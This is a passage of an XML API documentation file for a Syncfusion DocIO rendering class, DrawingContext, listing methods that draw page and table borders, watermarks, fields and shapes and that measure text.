            <param name="borderType">Type of the border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetBorderLineWidthArray(Syncfusion.DocIO.DLS.BorderStyle,System.Single)">
            <summary>
            Gets the border line array.
            </summary>
            <param name="borderType">Type of the border.</param>
            <param name="lineWidth">Width of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsDoubleBorder(Syncfusion.DocIO.DLS.Border)">
            <summary>
            To identify whether current border is double line border or triple line border
            </summary>
            <param name="border">Current border which is need to be check</param>
            <returns><c>True</c>id the current border type is double border</returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineLeftBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line left border.
            </summary>
            <param name="leftBorder">The left border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineLeftBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line left border.
            </summary>
            <param name="leftBorder">The left border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTripleLineLeftBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the triple line left border.
            </summary>
            <param name="leftBorder">The left border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineRightBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line right border.
            </summary>
            <param name="rightBorder">The right border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineRightBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line right border.
            </summary>
            <param name="rightBorder">The right border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTripleLineRightBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the triple line right border.
            </summary>
            <param name="rightBorder">The right border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isTopBorderSame">if set to <c>true</c> [is top border same].</param>
            <param name="isBetweenBorderSame">if set to <c>true</c> [is between border same].</param>
            <param name="isBottomBorderSame">if set to <c>true</c> [is bottom border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineTopBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line top border.
            </summary>
            <param name="topBorder">The top border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineTopBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line top border.
            </summary>
            <param name="topBorder">The top border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTripleLineTopBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the triple line top border.
            </summary>
            <param name="topBorder">The top border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineBottomBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line bottom border.
            </summary>
            <param name="bottomBorder">The bottom border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineBottomBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line bottom border.
            </summary>
            <param name="bottomBorder">The bottom border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTripleLineBottomBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the triple line bottom border.
            </summary>
            <param name="bottomBorder">The bottom border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineBetweenBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line between border.
            </summary>
            <param name="betweenBorder">The between border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
            <param name="leftBorder">The left border.</param>
            <param name="rightBorder">The right border.</param>
            <param name="isOverlapLeft">if set to <c>true</c> [is overlap left].</param>
            <param name="isOverlapRight">if set to <c>true</c> [is overlap right].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineBetweenBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line between border.
            </summary>
            <param name="betweenBorder">The between border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
            <param name="leftBorder">The left border.</param>
            <param name="rightBorder">The right border.</param>
            <param name="isOverlapLeft">if set to <c>true</c> [is overlap left].</param>
            <param name="isOverlapRight">if set to <c>true</c> [is overlap right].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTripleLineBetweenBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Boolean)">
            <summary>
            Draws the triple line between border.
            </summary>
            <param name="betweenBorder">The between border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isLeftBorderSame">if set to <c>true</c> [is left border same].</param>
            <param name="isRightBorderSame">if set to <c>true</c> [is right border same].</param>
            <param name="leftBorder">The left border.</param>
            <param name="rightBorder">The right border.</param>
            <param name="isOverlapLeft">if set to <c>true</c> [is overlap left].</param>
            <param name="isOverlapRight">if set to <c>true</c> [is overlap right].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLeftRightLineWidht(System.Single[],System.Boolean)">
            <summary>
            Gets the adjacent border line width
            </summary>
            <param name="lineArray">Left or right border line array</param>
            <param name="isLeft"><c>true</c> if we passing left border line array; otherwise false</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBackgroundColor(System.Drawing.Color,System.Int32,System.Int32)">
            <summary>
            Draws the color of the background.
            </summary>
            <param name="bgColor">Color of the bg.</param>
            <param name="width">The width.</param>
            <param name="height">The height.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBackgroundImage(System.Drawing.Image,Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Draws the back ground image.
            </summary>
            <param name="image">The image.</param>
            <param name="pageSetup">The page setup.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawWatermark(Syncfusion.DocIO.DLS.Watermark,Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF)">
            <summary>
            Draws the Watermark
            </summary>
            <param name="watermark">Watermark</param>
            <param name="width">Page width</param>
            <param name="height">Page height</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.Rendering.Page)">
            <summary>
            Imlementation of Draw method of page. 
            </summary>
            <param name="page">Currentl drawing page</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsEmptyWaterMark(Syncfusion.DocIO.DLS.Watermark)">
            <summary>
            Checks the current watermark is empty watermark or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsWaterMarkNeedToBeDraw(Syncfusion.DocIO.DLS.Rendering.Page)">
            <summary>
            Checks the HeaderFooter Paragraph and Table Weather WaterMark has to draw first
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsWaterMarkInParagraph(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.Rendering.Page)">
            <summary>
            Checks the paragraph weather watermark in Paragraph
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsWaterMarkInTable(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.Rendering.Page)">
            <summary>
            Checks the paragraph weather watermark in Table
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsWaterMarkOrderHasChanged(System.Int32,System.Boolean,Syncfusion.DocIO.DLS.Rendering.Page)">
            <summary>
            Checks which One has to draw first watermark or picture,shape,textbox
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.SplitWidgetContainer,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the splitWidgetContainer to PDF document or Image.
            </summary>
            <param name="widget">Currentl split widget container</param>
            <param name="layoutedWidget">Layouted widget</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Imlementation of Draw method of IWidget interface .
            </summary>
            <param name="cg"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawImpl(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw widget to graphics.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.IWidget,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the specified dc.
            </summary>
            <param name="dc">The dc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawPageBorder(System.Int32,Syncfusion.DocIO.DLS.Rendering.PageCollection)">
            <summary>
            Draw the page border
            </summary>
            <param name="i">Page number</param>
            <param name="dc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Imlementation of Draw method of BookMark interface .
            </summary>
            <param name="cg"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Imlementation of Draw method of LayoutedWidget interface .
            </summary>
            <param name="layoutedWidget">The Layouted widget.</param>
            <param name="isHaveToInitLayoutInfo">Is need to initialize layout info</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.ResetClip(System.Boolean,System.Drawing.RectangleF)">
            <summary>
            Reset Clipping bounds
            </summary>
            <param name="isClipBoundsNeedToBeUpdated"></param>
            <param name="cellBounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.SetClip(System.Boolean,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Boolean)">
            <summary>
            Set clipping bounds
            </summary>
            <param name="dc"></param>
            <param name="isClipBoundsNeedToBeUpdated"></param>
            <param name="bounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the paragraph
            </summary>
            <param name="paragraph"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.SplitTableWidget,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the split table widget
            </summary>
            <param name="splitTableWidget"></param>
            <param name="layoutedWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.StructureDocumentTag,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw method for StructureDocumentTag
            </summary>
            <param name="SDT"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WAbsoluteTab,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw AbsoluteTab
            </summary>
            <param name="absoluteTab"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WChart,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw chart as image
            </summary>
            <param name="chart"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawChart(Syncfusion.DocIO.DLS.WChart,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws chart
            </summary>
            <param name="chart"></param>
            <param name="widget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WCheckBox,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the Check box.
            </summary>
            <param name="checkBox"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WDropDownFormField,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the Drop Down Form Field.
            </summary>
            <param name="dropDownFormField"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WField,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the Fields.
            </summary>
            <param name="field"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WOleObject,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw Ole Object.
            </summary>
            <param name="oleObject"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WPicture,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the Picture.
            </summary>
            <param name="picture"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WSymbol,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the symbol.
            </summary>
            <param name="symbol"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTable,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the table.
            </summary>
            <param name="table"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the table cell.
            </summary>
            <param name="cell"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTableRow,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the table row.
            </summary>
            <param name="row"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTextBox,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the textbox.
            </summary>
            <param name="textBox"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTextFormField,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the text form field.
            </summary>
            <param name="textFormField"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.LeafEmtyWidget,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Imlementation of Draw method of LayoutedWidget interface 
            </summary>
            <param name="leafEmtyWidget"></param>
            <param name="layoutedWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.Shape,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the shape to PDF document or Image.
            </summary>
            <param name="shape">Current shape entity</param>
            <param name="ltWidget">Current shale layouted widget</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.SplitStringWidget,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the splitStringWidget
            </summary>
            <param name="splitStringWidget">SplitStringWidget</param>
            <param name="layoutedWidget">Layouted split string widget</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw the text ranges.
            </summary>
            <param name="textRange"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Draw(Syncfusion.Layouting.IStringWidget,Syncfusion.Layouting.LayoutedWidget,System.String)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <param name="ltWidget"></param>
            <param name="text"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawImpl(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw widget to graphics.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOwnerLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get Cell Widget
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetParagraphWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Gets the owner widget of the paragraph
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCellWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get owner widget of the cell
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsOverLappedShapeWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determines whether the layouted widget is Overlapping Widget
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns>
            	<c>true</c> if the layouted widget is Overlapping shape widget; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTextWatermark(Syncfusion.DocIO.DLS.TextWatermark,System.Drawing.RectangleF)">
            <summary>
            Draws the Text Watermark
            </summary>
            <param name="textWatermark">Text Watermark</param>
            <param name="bounds">Bounds</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawPageBorder(Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Draw border for the page
            </summary>
            <param name="pageSetup">Page setup object</param>
            <param name="headerBounds">Header bounds</param>
            <param name="footerBounds">Footer bounds</param>
            <param name="pageBounds">Page bounds</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLeftBorderPoints(Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Gets the bounds to draw left border
            </summary>
            <param name="pageSetup">Page setup object</param>
            <param name="headerBounds">Header bounds</param>
            <param name="footerBounds">Footer bounds</param>
            <param name="pageBounds">Page bounds</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetRightBorderPoints(Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Gets the bounds to draw right border
            </summary>
            <param name="pageSetup">Page setup object</param>
            <param name="headerBounds">Header bounds</param>
            <param name="footerBounds">Footer bounds</param>
            <param name="pageBounds">Page bounds</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetBottomBorderPoints(Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Gets the bounds to draw bottom border
            </summary>
            <param name="pageSetup">Page setup object</param>
            <param name="headerBounds">Header bounds</param>
            <param name="footerBounds">Footer bounds</param>
            <param name="pageBounds">Page bounds</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetTopBorderPoints(Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Gets the bounds to draw top border
            </summary>
            <param name="pageSetup">Page setup object</param>
            <param name="headerBounds">Header bounds</param>
            <param name="footerBounds">Footer bounds</param>
            <param name="pageBounds">Page bounds</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetFontSize(Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            Gets the font size for Text Watermark
            </summary>
            <param name="textWatermark">Text Watermark</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawImageWatermark(Syncfusion.DocIO.DLS.PictureWatermark,System.Drawing.RectangleF,Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Draws the Picture Watermark
            </summary>
            <param name="pictureWatermark">Picture Watermark</param>
            <param name="bounds">Bounds</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdatePictureWaterMarkPosition(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.WPageSetup,System.Drawing.RectangleF)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawCheckBox(Syncfusion.DocIO.DLS.WCheckBox,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the check box.
            </summary>
            <param name="checkbox">The checkbox.</param>
            <param name="ltBounds">The lt bounds.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsShapeNeedToBeFill(Syncfusion.DocIO.DLS.AutoShapeType)">
            <summary>
            
            </summary>
            <param name="shapeType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetGraphicsPath(Syncfusion.DocIO.DLS.Shape,System.Drawing.RectangleF,System.Drawing.Pen@)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Measures the image.
            </summary>
            <param name="image">The image.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureString(System.String,System.Drawing.Font,System.Drawing.StringFormat)">
            <summary>
            Measures the string.
            </summary>
            <param name="text">The text.</param>
            <param name="font">The font.</param>
            <param name="layoutArea">The layout area.</param>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureString(System.String,System.Drawing.Font,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat,System.Boolean)">
            <summary>
            Measures the string.
            </summary>
            <param name="text">The text.</param>
            <param name="font">The font.</param>
            <param name="layoutArea">The layout area.</param>
            <param name="format">The format.</param>
            <param name="charSpacing">The CharacterSpacing</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureString(System.String,System.Drawing.Font,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat,System.Boolean,System.Boolean)">
            <summary>
            Measures the string.
            </summary>
            <param name="text">The text.</param>
            <param name="font">The font.</param>
            <param name="format">The format.</param>
            <param name="charFormat">The character format.</param>
            <param name="isMeasureFromTabList">if set to <c>true</c> [is measure from tab list].</param>
            <param name="isMeasureFromSmallCapString">if set to <c>true</c> [is measure from small cap string].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetExceededLineHeightForArialUnicodeMSFont(System.Drawing.Font,System.Boolean)">
            <summary>
            Get the Exceeded line height of the Arial unicode MS font.
            </summary>
            <param name="font">The font.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureString(System.String,System.Drawing.Font,System.Drawing.Font,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Measures the string.
            </summary>
            <param name="text">The text.</param>
            <param name="font">The font.</param>
            <param name="layoutArea">The layout area.</param>
            <param name="format">The format.</param>
            <param name="charSpacing">The CharacterSpacing</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureSmallCapString(System.String,System.Drawing.SizeF@,System.Drawing.Font,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Measures the small cap string.
            </summary>
            <param name="text">The text.</param>
            <param name="size">The size.</param>
            <param name="font">The font.</param>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureUnicodeString(System.String,System.Drawing.Font,System.Drawing.Font,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Draw Unicode Text
            </summary>
            <param name="text"></param>
            <param name="font"></param>
            <param name="textBrush"></param>
            <param name="bounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.MeasureTextRange(Syncfusion.DocIO.DLS.WTextRange,System.String)">
            <summary>
            
            </summary>
            <param name="text"></param>
            <param name="txtRange"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetAscent(System.Drawing.Font)">
            <summary>
            Gets the ascent
            </summary>
            <param name="font">The Font.</param>
            <returns></returns>
        </member>
